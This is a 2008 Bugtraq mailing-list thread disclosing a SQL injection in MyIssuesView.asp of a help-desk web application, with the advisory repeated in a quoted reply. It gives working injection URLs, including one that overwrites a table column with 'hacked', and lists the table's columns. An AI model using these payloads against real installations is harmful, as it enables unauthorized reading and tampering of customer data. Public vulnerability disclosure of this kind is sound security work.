Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Office XP Remote SQL Injection
Mar 13 2008 05:32PM
no-reply Aria-security net
(1 replies)
Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21
PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]
Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--
List of columns
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.St
atus,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Prio
rity,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssu
es.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.Staf
fEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEma
il,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.Browser
Agent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.Cust
omFields,QIssues.CloseBy,QIssues.Age
Aria-Security Team
The-0utl4w
[ reply ]
Re: Office XP Remote SQL Injection
Mar 14 2008 05:47AM
Steve Shockley (steve shockley shockley net)
Privacy Statement
Copyright 2008, SecurityFocus
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21
PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]
Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--
List of columns
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.St
atus,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Prio
rity,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssu
es.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.Staf
fEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEma
il,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.Browser
Agent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.Cust
omFields,QIssues.CloseBy,QIssues.Age
Aria-Security Team
The-0utl4w
[ reply ]